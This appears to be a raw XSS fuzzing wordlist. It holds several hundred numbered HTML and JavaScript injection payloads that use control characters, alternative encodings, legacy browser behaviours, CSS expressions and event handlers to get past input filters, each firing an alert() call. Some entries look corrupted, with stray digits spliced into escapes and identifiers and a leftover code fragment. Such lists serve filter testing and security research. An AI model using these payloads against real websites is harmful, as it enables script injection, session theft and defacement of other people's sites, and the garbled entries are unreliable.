<a href="javas\x04cript:javascript:alert(96)" id="fuzzelement96">test</a>
<a href="javas\x097cript:javascript:alert(97)" id="fuzzelement97">test</a>
<a href="javas\x05cript:javascript:alert(98)" id="fuzzelement98">test</a>
<a href="javas\x0Bcript:javascript:alert(99)" id="fuzzelement99">test</a>
<a href="javas\x09cript:javascript:alert(100)" id="fuzzelement100">test</a>
<a href="javas\x06cript:javascript:alert(101)" id="fuzzelement101">test</a>
<a href="javas\x0Ccript:javascript:alert(102)" id="fuzzelement102">test</a>
<script>/* *\x2A/javascript:alert(103)// */</script>
<script>/* *\x00/javascript:alert(104)// */</script>
<style></style\x3E<img src="about:blank" οnerrοr=javascript:alert(105)//></style>
<style></style\x0D<img src="about:blank" οnerrοr=javascript:alert(106)//></style>
<style></style\x09<img src="about:blank" οnerrοr=javascript:alert(107)//></style>
<style></style\x20<img src="about:blank" οnerrοr=javascript:alert(108)//></style>
<style></style\x0A<img src="about:blank" οnerrοr=javascript:alert(109)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(110);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(111);/*';">DEF
<script>if("x\\xE112\x96\x89".length==2) { javascript:alert(112);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(113);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(114);}</script>
'`"><\x3Cscript>javascript:alert(115)</script>
'`"><\x00script>javascript:alert(116)</script>
"'`><\x3Cimg src=xxx:x οnerrοr=javascript:alert(117)>
"'`><\x00img src=xxx:x οnerrοr=javascript:alert(118)>
<script src="data:text/plain\x2Cjavascript:alert(119)"></script>
<script src="data:\xD4\x8F,javascript:alert(120)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(121)"></script>
<script src="data:\xCB\x8F,javascript:alert(122)"></script>
<script\x20type="text/javascript">javascript:alert(123);</script>
<script\x3Etype="text/javascript">javascript:alert(124);</script>
<script\x0Dtype="text/javascript">javascript:alert(125);</script>
<script\x09type="text/javascript">javascript:alert(126);</script>
<script\x0Ctype="text/javascript">javascript:alert(127);</script>
<script\x2Ftype="text/javascript">javascript:alert(128);</script>
<script\x0Atype="text/javascript">javascript:alert(129);</script>
ABC<div style="x\x3Aexpression(javascript:alert(130)">DEF
ABC<div style="x:expression\x5C(javascript:alert(131)">DEF
ABC<div style="x:expression\x00(javascript:alert(132)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(133)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(134)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(135)">DEF
ABC<div style="x:\x09expression(javascript:alert(136)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(137)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(138)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(139)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(140)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(141)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(142)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(143)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(144)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(145)">DEF
ABC<div style="x:\x20expression(javascript:alert(146)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(147)">DEF
ABC<div style="x:\x00expression(javascript:alert(148)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(149)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(150)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(151)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(152)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(153)">DEF
ABC<div style="x:\xE2\x80\x8154expression(javascript:alert(154)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(155)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(156)">DEF
<a href="\x0Bjavascript:javascript:alert(157)" id="fuzzelement157">test</a>
<a href="\x0Fjavascript:javascript:alert(158)" id="fuzzelement158">test</a>
<a href="\xC2\xA0javascript:javascript:alert(159)" id="fuzzelement159">test</a>
<a href="\x05javascript:javascript:alert(160)" id="fuzzelement160">test</a>
<a href="\xE161\xA0\x8Ejavascript:javascript:alert(161)" id="fuzzelement161">test</a>
<a href="\x1628javascript:javascript:alert(162)" id="fuzzelement162">test</a>
<a href="\x163163javascript:javascript:alert(163)" id="fuzzelement163">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(164)" id="fuzzelement164">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(165)" id="fuzzelement165">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(166)" id="fuzzelement166">test</a>
<a href="\x1677javascript:javascript:alert(167)" id="fuzzelement167">test</a>
<a href="\x03javascript:javascript:alert(168)" id="fuzzelement168">test</a>
<a href="\x0Ejavascript:javascript:alert(169)" id="fuzzelement169">test</a>
<a href="\x170Ajavascript:javascript:alert(170)" id="fuzzelement170">test</a>
<a href="\x00javascript:javascript:alert(171)" id="fuzzelement171">test</a>
<a href="\x1720javascript:javascript:alert(172)" id="fuzzelement172">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(173)" id="fuzzelement173">test</a>
<a href="\x20javascript:javascript:alert(174)" id="fuzzelement174">test</a>
<a href="\x1753javascript:javascript:alert(175)" id="fuzzelement175">test</a>
<a href="\x09javascript:javascript:alert(176)" id="fuzzelement176">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(177)" id="fuzzelement177">test</a>
<a href="\x1784javascript:javascript:alert(178)" id="fuzzelement178">test</a>
<a href="\x1799javascript:javascript:alert(179)" id="fuzzelement179">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(180)" id="fuzzelement180">test</a>
<a href="\x181Fjavascript:javascript:alert(181)" id="fuzzelement181">test</a>
<a href="\xE2\x80\x8182javascript:javascript:alert(182)" id="fuzzelement182">test</a>
<a href="\x183Djavascript:javascript:alert(183)" id="fuzzelement183">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(184)" id="fuzzelement184">test</a>
<a href="\x07javascript:javascript:alert(185)" id="fuzzelement185">test</a>
<a href="\xE186\x9A\x80javascript:javascript:alert(186)" id="fuzzelement186">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(187)" id="fuzzelement187">test</a>
<a href="\x04javascript:javascript:alert(188)" id="fuzzelement188">test</a>
<a href="\x0189javascript:javascript:alert(189)" id="fuzzelement189">test</a>
<a href="\x08javascript:javascript:alert(190)" id="fuzzelement190">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(191)" id="fuzzelement191">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(192)" id="fuzzelement192">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(193)" id="fuzzelement193">test</a>
<a href="\x1942javascript:javascript:alert(194)" id="fuzzelement194">test</a>
<a href="\x0Djavascript:javascript:alert(195)" id="fuzzelement195">test</a>
<a href="\x0Ajavascript:javascript:alert(196)" id="fuzzelement196">test</a>
<a href="\x0Cjavascript:javascript:alert(197)" id="fuzzelement197">test</a>
<a href="\x1985javascript:javascript:alert(198)" id="fuzzelement198">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(199)" id="fuzzelement199">test</a>
<a href="\x2006javascript:javascript:alert(200)" id="fuzzelement200">test</a>
<a href="\x02javascript:javascript:alert(201)" id="fuzzelement201">test</a>
<a href="\x202Bjavascript:javascript:alert(202)" id="fuzzelement202">test</a>
<a href="\x06javascript:javascript:alert(203)" id="fuzzelement203">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(204)" id="fuzzelement204">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(205)" id="fuzzelement205">test</a>
<a href="\x206Ejavascript:javascript:alert(206)" id="fuzzelement206">test</a>
<a href="\xE2\x8207\x9Fjavascript:javascript:alert(207)" id="fuzzelement207">test</a>
<a href="\x208Cjavascript:javascript:alert(208)" id="fuzzelement208">test</a>
<a href="javascript\x00:javascript:alert(209)" id="fuzzelement209">test</a>
<a href="javascript\x3A:javascript:alert(210)" id="fuzzelement210">test</a>
<a href="javascript\x09:javascript:alert(211)" id="fuzzelement211">test</a>
<a href="javascript\x0D:javascript:alert(212)" id="fuzzelement212">test</a>
<a href="javascript\x0A:javascript:alert(213)" id="fuzzelement213">test</a>
`"'><img src=xxx:x \x0Aοnerrοr=javascript:alert(214)>
`"'><img src=xxx:x \x22οnerrοr=javascript:alert(215)>
`"'><img src=xxx:x \x0Bοnerrοr=javascript:alert(216)>
`"'><img src=xxx:x \x0Dοnerrοr=javascript:alert(217)>
`"'><img src=xxx:x \x2Fοnerrοr=javascript:alert(218)>
`"'><img src=xxx:x \x09οnerrοr=javascript:alert(219)>
`"'><img src=xxx:x \x0Cοnerrοr=javascript:alert(220)>
`"'><img src=xxx:x \x00οnerrοr=javascript:alert(221)>
`"'><img src=xxx:x \x27οnerrοr=javascript:alert(222)>
`"'><img src=xxx:x \x20οnerrοr=javascript:alert(223)>
"`'><script>\x3Bjavascript:alert(224)</script>
"`'><script>\x0Djavascript:alert(225)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(226)</script>
"`'><script>\xE2\x80\x8227javascript:alert(227)</script>
"`'><script>\xE2\x80\x84javascript:alert(228)</script>
"`'><script>\xE3\x80\x80javascript:alert(229)</script>
"`'><script>\x09javascript:alert(230)</script>
"`'><script>\xE2\x80\x89javascript:alert(231)</script>
"`'><script>\xE2\x80\x85javascript:alert(232)</script>
"`'><script>\xE2\x80\x88javascript:alert(233)</script>
"`'><script>\x00javascript:alert(234)</script>
"`'><script>\xE2\x80\xA8javascript:alert(235)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(236)</script>
"`'><script>\xE237\x9A\x80javascript:alert(237)</script>
"`'><script>\x0Cjavascript:alert(238)</script>
"`'><script>\x2Bjavascript:alert(239)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(240)</script>
"`'><script>-javascript:alert(241)</script>
"`'><script>\x0Ajavascript:alert(242)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(243)</script>
"`'><script>\x7Ejavascript:alert(244)</script>
"`'><script>\xE2\x80\x87javascript:alert(245)</script>
"`'><script>\xE2\x8246\x9Fjavascript:alert(246)</script>
"`'><script>\xE2\x80\xA9javascript:alert(247)</script>
"`'><script>\xC2\x85javascript:alert(248)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(249)</script>
"`'><script>\xE2\x80\x83javascript:alert(250)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(251)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(252)</script>
"`'><script>\xE2\x80\x80javascript:alert(253)</script>
"`'><script>\x2254javascript:alert(254)</script>
"`'><script>\xE2\x80\x82javascript:alert(255)</script>
"`'><script>\xE2\x80\x86javascript:alert(256)</script>
"`'><script>\xE257\xA0\x8Ejavascript:alert(257)</script>
"`'><script>\x0Bjavascript:alert(258)</script>
"`'><script>\x20javascript:alert(259)</script>
"`'><script>\xC2\xA0javascript:alert(260)</script>
"/><img/οnerrοr=\x0Bjavascript:alert(261)\x0Bsrc=xxx:x />
"/><img/οnerrοr=\x22javascript:alert(262)\x22src=xxx:x />
"/><img/οnerrοr=\x09javascript:alert(263)\x09src=xxx:x />
"/><img/οnerrοr=\x27javascript:alert(264)\x27src=xxx:x />
"/><img/οnerrοr=\x0Ajavascript:alert(265)\x0Asrc=xxx:x />
"/><img/οnerrοr=\x0Cjavascript:alert(266)\x0Csrc=xxx:x />
"/><img/οnerrοr=\x0Djavascript:alert(267)\x0Dsrc=xxx:x />
"/><img/οnerrοr=\x60javascript:alert(268)\x60src=xxx:x />
"/><img/οnerrοr=\x20javascript:alert(269)\x20src=xxx:x />
<script\x2F>javascript:alert(270)</script>
<script\x20>javascript:alert(271)</script>
<script\x0D>javascript:alert(272)</script>
<script\x0A>javascript:alert(273)</script>
<script\x0C>javascript:alert(274)</script>
<script\x00>javascript:alert(275)</script>
<script\x09>javascript:alert(276)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(277)>
`"'><img src=xxx:x onerror\x00=javascript:alert(278)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(279)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(280)>
`"'><img src=xxx:x onerror\x20=javascript:alert(281)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(282)>
`"'><img src=xxx:x onerror\x09=javascript:alert(283)>
<script>javascript:alert(284)<\x00/script>
<img src=# onerror\x3D"javascript:alert(285)" >
<input οnfοcus=javascript:alert(286) autofocus>
<input οnblur=javascript:alert(287) autofocus><input autofocus>
<video poster=javascript:javascript:alert(288)//
<body οnscrοll=javascript:alert(289)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(290)><input></form><button form=test onformchange=javascript:alert(290)>X
<video><source οnerrοr="javascript:javascript:alert(291)">
<video οnerrοr="javascript:javascript:alert(292)"><source>
<form><button formaction="javascript:javascript:alert(293)">X
<body οninput=javascript:alert(294)><input autofocus>
<math href="javascript:javascript:alert(295)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(295)">CLICKME</maction> </math>
<frameset οnlοad=javascript:alert(296)>
<table background="javascript:javascript:alert(297)">
<!--<img src="--><img src=x οnerrοr=javascript:alert(298)//">
<comment><img src="</comment><img src=x οnerrοr=javascript:alert(299))//">
<![><img src="]><img src=x οnerrοr=javascript:alert(300)//">
<style><img src="</style><img src=x οnerrοr=javascript:alert(301)//">
<li style=list-style:url() οnerrοr=javascript:alert(302)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden οnlοad=javascript:alert(302)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(303)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(304)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-305305D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(305)"></OBJECT>
<b <script>alert(308)</script>0
<div id="div309"><input value="``οnmοuseοver=javascript:alert(309)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div309").innerHTML;</script>
<x '="foo"><x foo='><img src=x οnerrοr=javascript:alert(310)//'>
<embed src="javascript:alert(311)">
<img src="javascript:alert(312)">
<image src="javascript:alert(313)">
<script src="javascript:alert(314)">
<div style=width:315px;filter:glow onfilterchange=javascript:alert(315)>x
<? foo="><script>javascript:alert(316)</script>">
<! foo="><script>javascript:alert(317)</script>">
</ foo="><script>javascript:alert(318)</script>">
<? foo="><x foo='?><script>javascript:alert(319)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(320)</script>">
<% foo><x foo="%><script>javascript:alert(321)</script>">
<div id=d><x xmlns="><iframe οnlοad=javascript:alert(322)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x οnerrοr="alert(323)">
<img \x47src=x οnerrοr="javascript:alert(324)">
<img \x325325src=x οnerrοr="javascript:alert(325)">
<img \x3262src=x οnerrοr="javascript:alert(326)">
<img\x47src=x οnerrοr="javascript:alert(327)">
<img\x3280src=x οnerrοr="javascript:alert(328)">
<img\x3293src=x οnerrοr="javascript:alert(329)">
<img\x32src=x οnerrοr="javascript:alert(330)">
<img\x47src=x οnerrοr="javascript:alert(331)">
<img\x332332src=x οnerrοr="javascript:alert(332)">
<img \x47src=x οnerrοr="javascript:alert(333)">
<img \x34src=x οnerrοr="javascript:alert(334)">
<img \x39src=x οnerrοr="javascript:alert(335)">
<img \x00src=x οnerrοr="javascript:alert(336)">
<img src\x09=x οnerrοr="javascript:alert(337)">
<img src\x3380=x οnerrοr="javascript:alert(338)">
<img src\x3393=x οnerrοr="javascript:alert(339)">
<img src\x32=x οnerrοr="javascript:alert(340)">
<img src\x3412=x οnerrοr="javascript:alert(341)">
<img src\x342342=x οnerrοr="javascript:alert(342)">
<img src\x00=x οnerrοr="javascript:alert(343)">
<img src\x47=x οnerrοr="javascript:alert(344)">
<img src=x\x09οnerrοr="javascript:alert(345)">
<img src=x\x3460οnerrοr="javascript:alert(346)">
<img src=x\x347347οnerrοr="javascript:alert(347)">
<img src=x\x3482οnerrοr="javascript:alert(348)">
<img src=x\x3493οnerrοr="javascript:alert(349)">
<img[a][b][c]src[d]=x[e]οnerrοr=[f]"alert(350)">
<img src=x οnerrοr=\x09"javascript:alert(351)">
<img src=x οnerrοr=\x3520"javascript:alert(352)">
<img src=x οnerrοr=\x353353"javascript:alert(353)">
<img src=x οnerrοr=\x3542"javascript:alert(354)">
<img src=x οnerrοr=\x32"javascript:alert(355)">
<img src=x οnerrοr=\x00"javascript:alert(356)">
<a href=javať񗏭෴script:javascript:alert(357)>XXX</a>
<img src="x` `<script>javascript:alert(358)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(359)//">
<title onpropertychange=javascript:alert(360)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x οnerrοr=javascript:alert(361)></a>">
<!--[if]><script>javascript:alert(362)</script -->
<!--[if<img src=x οnerrοr=javascript:alert(363)//]> -->
<object id="x" classid="clsid:CB927D3662-4FF7-4a9e-A36669-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C3667-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(366)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(367)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" οnclick="javascript:alert(371);">XXX</a></a><a href="javascript:javascript:alert(371)">XXX</a>
<// style=x:expression\28javascript:alert(375)\29>
<style>*{x:expression(javascript:alert(376))}</style>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(378));">X
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(384)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(385))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(386)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(387)')()</script>
<meta charset="mac-farsi">¼script¾javascript:alert(390)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(391)` >
392<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh䎒vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"οnerrοr=javascript:alert(392)>`>
393<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."οnerrοr=javascript:alert(393)>>
395<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(395) strokecolor=white strokeweight=395000px from=0 to=395000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(396)">XXX</a>
<event-source src="%(event)s" οnlοad="javascript:alert(399)">
<a href="javascript:javascript:alert(400)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(401)>">
<script>javascript:alert(405)</script>
<IMG SRC="javascript:javascript:alert(406);">
<IMG SRC=javascript:javascript:alert(407)>
<IMG SRC=`javascript:javascript:alert(408)`>
<FRAMESET><FRAME SRC="javascript:javascript:alert(410);"></FRAMESET>
<BODY ONLOAD=javascript:alert(411)>
<BODY ONLOAD=javascript:javascript:alert(412)>
<IMG SRC="jav ascript:javascript:alert(413);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(414)>
<IMG SRC="javascript:javascript:alert(417)"
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(419);">
<IMG DYNSRC="javascript:javascript:alert(420)">
<IMG LOWSRC="javascript:javascript:alert(421)">
<BGSOUND SRC="javascript:javascript:alert(422);">
<BR SIZE="&{javascript:alert(423)}">
<LINK REL="stylesheet" HREF="javascript:javascript:alert(425);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(430);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(431);">
<IFRAME SRC="javascript:javascript:alert(432);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(433)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(434)">
<DIV STYLE="background-image: url(javascript:javascript:alert(435))">
<DIV STYLE="width:expression(javascript:alert(436));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(437))">
<XSS STYLE="xss:expression(javascript:alert(438))">
<STYLE TYPE="text/javascript">javascript:alert(439);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(440)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(441)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(442);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(443);//">
<OBJECT classid=clsid:ae24fdae-03c6-445445d445-8b76-0080c744f389><param name=url value=javascript:javascript:alert(445)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(446)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(447)</SCRIPT>"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:javascript:alert(450)">X
<body οnscrοll=javascript:alert(451)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(452)">
<STYLE>a{background:url('s454' 's2)}@import javascript:javascript:alert(454);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(455)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(456);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(457);></style>
<?xml version="458.0"?><html:html xmlns:html='http://www.w3.org/458999/xhtml'><html:script>javascript:alert(458);</html:script></html:html>
<embed code=javascript:javascript:alert(460);></embed>
<frameset οnlοad=javascript:javascript:alert(462)></frameset>
<object οnerrοr=javascript:javascript:alert(463)>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(465);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(466);};>
<a href="javAascript:javascript:alert(467)">test467</a>
<a href="javaascript:javascript:alert(468)">test468</a>
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;οnerrοr=javascript:alert(470)&gt;>">
';alert(471))//';alert(471))//";
alert(472))//";alert(472))//--
></SCRIPT>">'><SCRIPT>alert(473))</SCRIPT>
<IMG SRC="javascript:alert(476);">
<IMG SRC=javascript:alert(477)>
<IMG SRC=JaVaScRiPt:alert(478)>
<IMG SRC=javascript:alert(479)>
<IMG SRC=`javascript:alert(480)`>
<a οnmοuseοver="alert(481)">xxs link</a>
<a οnmοuseοver=alert(482)>xxs link</a>
<IMG """><SCRIPT>alert(483)</SCRIPT>">
<IMG SRC=javascript:alert(484))>
<IMG SRC=# οnmοuseοver="alert(485)">
<IMG SRC= οnmοuseοver="alert(486)">
<IMG οnmοuseοver="alert(487)">
<IMG SRC="jav ascript:alert(491);">
<IMG SRC="jav ascript:alert(492);">
<IMG SRC="jav
ascript:alert(493);">
<IMG SRC="jav
ascript:alert(494);">
perl -e 'print "<IMG SRC=java\0script:alert(495)>";' > out
<IMG SRC="  javascript:alert(496);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(498)>
<<SCRIPT>alert(500);//<</SCRIPT>
<IMG SRC="javascript:alert(503)"
\";alert(505);//
</TITLE><SCRIPT>alert(506);</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(507);">
<BODY BACKGROUND="javascript:alert(508)">
<IMG DYNSRC="javascript:alert(509)">
<IMG LOWSRC="javascript:alert(510)">
<STYLE>li {list-style-image: url("javascript:alert(511)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert(514)>
<BGSOUND SRC="javascript:alert(515);">
<BR SIZE="&{alert(516)}">
<LINK REL="stylesheet" HREF="javascript:alert(517);">
<STYLE>@im\port'\ja\vasc\ript:alert(522)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(523))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(524))'>
<STYLE TYPE="text/javascript">alert(525);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(526)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(527)")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert(528)")}</STYLE>
<XSS STYLE="xss:expression(alert(529))">
¼script¾alert(531)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(532);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(534);">
<IFRAME SRC="javascript:alert(535);"></IFRAME>
<IFRAME SRC=# οnmοuseοver="alert(536)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(537);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(538)">
<TABLE><TD BACKGROUND="javascript:alert(539)">
<DIV STYLE="background-image: url(javascript:alert(540))">
<DIV STYLE="background-image: url(javascript:alert(542))">
<DIV STYLE="width: expression(alert(543));">
<BASE HREF="javascript:alert(544);//">
<? echo('<SCR)';echo('IPT>alert(549)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(552)</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(553);+ADw-/SCRIPT+AD4-
<img src=`%00`
 οnerrοr=alert(573)

<script /*%00*/>/*%00*/alert(577)/*%00*/</script /*%00*/
<iframe/src="data:text/html,<svg ��load=alert(579)>">
<meta content="
 580 
; JAVASCRIPT: alert(580)" http-equiv="refresh"/>
<form><iframe ᛸ src="javascript:alert(588)"ᛸ ;>
http://www.google<script .com>alert(590)</script
<script ^__^>alert(594))</script ^__^
</style ><script :-(>/**/alert(595)/**/</script :-(
�</form><input typeᧄ"date" οnfοcus="alert(596)">
<a href="javascript:void(0)" οnmοuseοver=
javascript:alert(600)
>X</a>
<script ~~~>alert(601)</script ~~~>
<iframe/%00/ src=javaSCRIPT:alert(609)
<%<!--'%><script>alert(626);</script -->
<script src="data:text/javascript,alert(627)"></script>
<iframe/onreadystatechange=alert(629)
<svg/οnlοad=alert(630)
<input type="text" value=`` <div/οnmοuseοver='alert(632)'>X</div>
http://www.<script>alert(633)</script .com
<svg><script ?>alert(635)
<img src=`xx:xx`οnerrοr=alert(637)>
<meta http-equiv="refresh" content="0;javascript:alert(639)"/>
<script>+-+-649-+-+alert(649)</script>
<body/οnlοad=<!-->ᥤalert(650)>
<script itworksinallbrowsers>/*<script* */alert(651)</script
<img src ?itworksonchrome?\/onerror = alert(652)
<svg><script onlypossibleinopera:-)> alert(654)
<script x> alert(656) </script 656=2
<div/οnmοuseοver='alert(657)'> style="x:">
<--`<img/src=` οnerrοr=alert(658)> --!>
<div style="position:absolute;top:0;left:0;width:66000%;height:66000%" οnmοuseοver="prompt(660)" οnclick="alert(660)">x</button>
<form><button formaction=javascript:alert(662)>CLICKME
‘; alert(667);
‘)alert(668);//
<ScRiPt>alert(669)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(670)>
<IMG SRC=”javascript:alert(671);”>
<IMG SRC=javascript:alert(672)>
<IMG SRC=javascript:alert(673)>
<img src=xss οnerrοr=alert(674)>
<img src=`%00`
 οnerrοr=alert(681)

<script /*%00*/>/*%00*/alert(685)/*%00*/</script /*%00*/
<iframe/src="data:text/html,<svg ��load=alert(687)>">
<meta content="
 688 
; JAVASCRIPT: alert(688)" http-equiv="refresh"/>
<form><iframe ᬰ src="javascript:alert(696)"ᬰ ;>
http://www.google<script .com>alert(698)</script
<script ^__^>alert(702))</script ^__^
</style ><script :-(>/**/alert(703)/**/</script :-(
�</form><input typeᨰ"date" οnfοcus="alert(704)">
<a href="javascript:void(0)" οnmοuseοver=
javascript:alert(708)
>X</a>
<script ~~~>alert(709)</script ~~~>
<iframe/%00/ src=javaSCRIPT:alert(717)
<%<!--'%><script>alert(734);</script -->
<script src="data:text/javascript,alert(735)"></script>
<iframe/onreadystatechange=alert(737)
